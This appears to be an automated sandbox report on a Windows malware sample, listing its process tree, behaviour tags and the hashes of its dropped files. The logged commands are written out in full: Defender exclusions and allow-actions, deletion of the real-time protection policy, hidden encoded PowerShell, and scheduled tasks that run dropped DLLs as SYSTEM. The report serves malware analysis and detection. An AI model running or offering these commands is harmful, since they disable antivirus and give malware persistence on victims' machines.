C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtTPlVLhSaUn" /t REG_DWORD /d 0 /reg:324⤵PID:696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtTPlVLhSaUn" /t REG_DWORD /d 0 /reg:644⤵PID:1000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OOuPExCnaYTU2" /t REG_DWORD /d 0 /reg:324⤵PID:1848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OOuPExCnaYTU2" /t REG_DWORD /d 0 /reg:644⤵PID:2196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpUBPkkqU" /t REG_DWORD /d 0 /reg:324⤵PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpUBPkkqU" /t REG_DWORD /d 0 /reg:644⤵PID:2228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR" /t REG_DWORD /d 0 /reg:324⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR" /t REG_DWORD /d 0 /reg:644⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQtOyvtwIjTyC" /t REG_DWORD /d 0 /reg:324⤵PID:2164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQtOyvtwIjTyC" /t REG_DWORD /d 0 /reg:644⤵PID:1604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HNIqBcslfBUMDlVB" /t REG_DWORD /d 0 /reg:324⤵PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HNIqBcslfBUMDlVB" /t REG_DWORD /d 0 /reg:644⤵PID:2156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC" /t REG_DWORD /d 0 /reg:324⤵PID:2640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC" /t REG_DWORD /d 0 /reg:644⤵PID:2516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:324⤵PID:2836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:644⤵PID:2168
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJwsXMffm" /SC once /ST 08:24:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJwsXMffm"3⤵PID:2528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJwsXMffm"3⤵PID:2744
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1320
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2636
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2492
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcaOKtldTodyQokzi" /SC once /ST 08:20:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\xWvzdveufkqfSjMY\GlZDwMGWQlYkIIu\JMxOicC.exe\" E0 /YvFJdidvv 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcaOKtldTodyQokzi"3⤵PID:2112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 6363⤵
- Loads dropped DLL
- Program crash
PID:480
-
-
-
C:\Windows\Temp\xWvzdveufkqfSjMY\GlZDwMGWQlYkIIu\JMxOicC.exeC:\Windows\Temp\xWvzdveufkqfSjMY\GlZDwMGWQlYkIIu\JMxOicC.exe E0 /YvFJdidvv 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2964 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2956
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:1096
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1496
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2084
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:1764
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:3064
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:1856
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:800
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1420
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2944
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:1484
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:540
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:644
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:440
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1288
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1812 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1780
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bLzeoVMxrLqUlFeJJd"3⤵PID:1988
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:700
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:1352
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2352
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2600
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:1148
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\mpUBPkkqU\vIKWnI.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "WDtolTrtWazUMxY" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WDtolTrtWazUMxY2" /F /xml "C:\Program Files (x86)\mpUBPkkqU\PkylmLl.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1944
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "WDtolTrtWazUMxY"3⤵PID:688
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WDtolTrtWazUMxY"3⤵PID:1652
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZWXOZUeuJXYTDm" /F /xml "C:\Program Files (x86)\OOuPExCnaYTU2\qHPCWnw.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WcUYmDlAoBbmM2" /F /xml "C:\ProgramData\HNIqBcslfBUMDlVB\vurANVj.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nkuCsTJKypmxURcwD2" /F /xml "C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR\qOrmXMO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dIhZtjcxirnwDOJOLwq2" /F /xml "C:\Program Files (x86)\tQtOyvtwIjTyC\KqABNFU.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ffSBZYZjRJDDYrjLt" /SC once /ST 08:04:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\xWvzdveufkqfSjMY\rZuSDULh\YJXvDuP.dll\",#1 /sDKdidbDr 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ffSBZYZjRJDDYrjLt"3⤵PID:588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcaOKtldTodyQokzi"3⤵PID:2388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 15283⤵
- Loads dropped DLL
- Program crash
PID:2788
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\xWvzdveufkqfSjMY\rZuSDULh\YJXvDuP.dll",#1 /sDKdidbDr 5254032⤵PID:2868
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\xWvzdveufkqfSjMY\rZuSDULh\YJXvDuP.dll",#1 /sDKdidbDr 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1248 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ffSBZYZjRJDDYrjLt"4⤵PID:700
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5301098C-7FC6-49D5-BF2D-7F2245F6617C} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]1⤵PID:1816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:884 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1924
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2924
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2348
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:772
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1996
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3044
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e513b4ecaa7f83ffa1b05341ba896a6e
SHA1aecbfc95a82d3b328260d6cac7640a9f6e73d643
SHA2569e184140c3095daae26d1874ded25bb51d33794b0554245f2224ccfbf50ec2d2
SHA512e80e35ba74ecf84c9af6ccc0f97f9ef41a77ac763c47a90295123805ca5b8ceeba2b0e8d2aa4738c82782a078f2359cfbef3f4f54f5054c510cf57ff30c0ca68
-
Filesize
2KB
MD5815f0613221b3d036ce11d3e5a3c2bf0
SHA150cbee0fda2fd6121001d20c7dd83af6b1977f02
SHA25640ba74b0c8f91816802db6e5bc4d727a36ccc40f651f44973c350c0275e71827
SHA512f191a8a89d4f6c324b15eab68f14ab9cd038ffa9020589a8b49edce2c0eb0f2cc73bcf199ce59ce4b19c7156263493e5e7d057109febdc03f6b9a9ce2530e931
-
Filesize
2KB
MD50015f85e6f460e3cce26654c98090cf8
SHA1b3b558176471942033b91335976be393e41d4200
SHA256033861d0b98e516dfec772b7a10e09f3dd81f512ecb8403027c8d1a3cc27eebf
SHA512e94b21d32c17de571f77e925ffa10fbe28840e488f2c86ff485ea4a4318a19f8535429c1ff1bc6d93c26425fe724cbdd65afcacfc5aae0372e37c0e0a9b0f063
-
Filesize
2KB
MD501c188f7b796bab785a6daafd6b701ac
SHA13728316100283e7e6b10c6aa1e7dbd532189132a
SHA25678356ae0e033f1f7f9b4d98baa76f22a63b676ecb488dcf98900dd2d2e74a53f
SHA512500b44ca6a96f0c2d4747c2d0744713fbea118100a33a87503376c05865297ef0b7be5af4c551148f80d13fe28a651e66c073ae8bda510bdac9ecd867577dab9
-
Filesize
2.0MB
MD57ca8804e1e7d57e42b0023e79e0eaaf5
SHA14561a5bb5d8bfecfb64b9371e572ded84f8b09b5
SHA25605b7d4089c078508d7ddb95e337541fcfb1b64f73fe4668839be750ec0af1558
SHA512beaa895656ccc2987a472465a077bee723e5016e8db51a80273c6c6e82882c5209e51220ac66132df4e93eab042f3e1ea136572ef21f9d8ee7ba9e5393077ce4
-
Filesize
2KB
MD5c436cbbf9f17ac3a76328fd847859232
SHA1391bdeea8d452450ad2ee5e3e54cb2a6e58c220b
SHA256b876378ecfa40fcd1730d5103410b1b5adab08f48880b981d3a84464b4457168
SHA51299ccc1e832b38dd4a7d7939de8d99cf4460f20079af31457134ea1ab3152570331a89e9da106742c09cda43d36f4ef5c51164e325a4a935be8c8d16bde6853a2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5784b6867811095f8c6f5710734b233b2
SHA1c0514aa6694ebceb723c7d02bbd6535f92f51e7f
SHA256200e383a4f7de1dccdc3684f32972156ba5d344e58c5385fe5cfdf22a8311693
SHA512ff0df6986df513723c16ca31116899cfe757f3d11b2b369fb4a89370aa42f76811c4380ef9aa44e184e4fc0c33076a725979bda4ac5515b0d5d1827f94fecdfa
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5567c5971e0519976ade6d3c1ee7fac60
SHA1601874c9b67705ddb6d64999427f66f09107ae55
SHA256022ded2afad96cfc61f78a837bebdb82d2583579662c8191a08a18888f0fb0ff
SHA512c682590d326f9233729526e6f47e25635ed7189a9874e7d26e57f710644010058057556bbf9f56249934d90a0e5b935fe953a9fa2d98a96fd90fc78da3e148af
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5bcf22b8a1065331a2268a27d4310a50e
SHA164f08dda7eaa46a0ea2e1ac94b8b347874440da3
SHA256ea97eb132838f6636d873cdb336402915eae9d8da1a79f88f62d6a24dcd20dc3
SHA512a1a15128c251313afb7bf7173654f53ee90497f726a2d9a458fe057dc5f9c56a31c46ed36410c073246c78c3001c6b42244eaecc49d2f97b8f4800b42f9f7108
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD580a35d50cfc0d6dbd2d5ab3123cd9e81
SHA1307e61488a474ea6231d0162d342fd44545b3b2a
SHA256d05a14a10e97a9b42ecc65ff3362a9ae3753aee0569d8511daea16c07518e1ba
SHA51253d5120b297c0d4a2cc879cd4d2226e2b8393b7f9d74c73f67025e63952dc1e78346981ed781c817dbe0da074980e10fa173f2caf9ad41ecbcab4bcb12aa5e50
-
Filesize
7KB
MD5b96294b2a0a13c03fd27e9ec9ae43ca9
SHA117ed8e3f470bd966d4ebf044f7330225ea0ce2ce
SHA2567c79b289553e4a91a1ea199a67fdb976ee0780a48d061267cceb3975786f3c48
SHA512d366ae6057b22c9b8484c7a3e3a1e8b470d85a7b49c3640e4e2a582daadfcc708ab788a19ccd334a68643e647d900cd754d4a4fb7a91ef0ae92cef9ff6f5f135
-
Filesize
9KB
MD519a0b03cb32ed2866887e25af7c9ce4c
SHA10db01b2d5d01bb9a8dce0565a0da8cbc8e3a9f21
SHA256e02cd2e3d40f85dc041c14c3e146135caae8f742f9d545a54b7e708b45af6c8c
SHA5127c7e5f0206e8f2d008d4e9b550bbd34c322e7f49833ef4d512c996cc5234ebea1e21312dbdc0504437a223d9ebf5ab552620758bac3c14dbebbb94c129920f8e
-
Filesize
6.3MB
MD5dd1dce6e3e1640eca5466393ee3bd774
SHA18e91f2193b3982d475ff78727d3e1609b594f550
SHA2560ca1ac8b730d3981e041de858c3452e3f509e1505ce5c0ca7ba26baf85c840f2
